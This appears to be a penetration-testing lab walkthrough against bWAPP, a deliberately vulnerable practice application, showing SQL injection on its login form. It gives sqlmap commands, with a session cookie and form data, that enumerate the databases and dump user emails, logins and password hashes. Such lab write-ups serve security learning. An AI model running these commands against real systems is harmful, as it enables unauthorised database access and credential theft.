SQL Injection (Login Form\User)


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Using single quote in the login form we got the SQL error
I tried few manual bypass techniques but it’s not working or maybe it could be blind SQLi, so I am using SQLmap for this to enumerate it further.
For that, First capture the login request in burp 105 106
To start with SQLmap we need URL, Cookie and login-password form 107
{ sqlmap -u "" --cookie="PHPSESSID=9d942f4327321b4cc8a5fe27b5b78d7d; security_level=0" --data="login=test&password=test&form=submit" –dbs --fresh-queries } 108 109
And in the end we can see in the result the name of the databases available. 110
Now dump the Database 111
And there is 5 tables available in it, now let’s check what’s inside the table “users” 112 113
Inside users table there are 09 columns let’s dump the login and password of the users. 114
{ sqlmap -u "" --cookie="PHPSESSID=9d942f4327321b4cc8a5fe27b5b78d7d; security_level=0" --data="login=test&password=test&form=submit" -D bWAPP -t users -C email,login,password –dump } 115 116 117
Using SQLmap we eventually dumped all the emails, login and password with their hashes in just few steps which would be difficult for us to do it manually.

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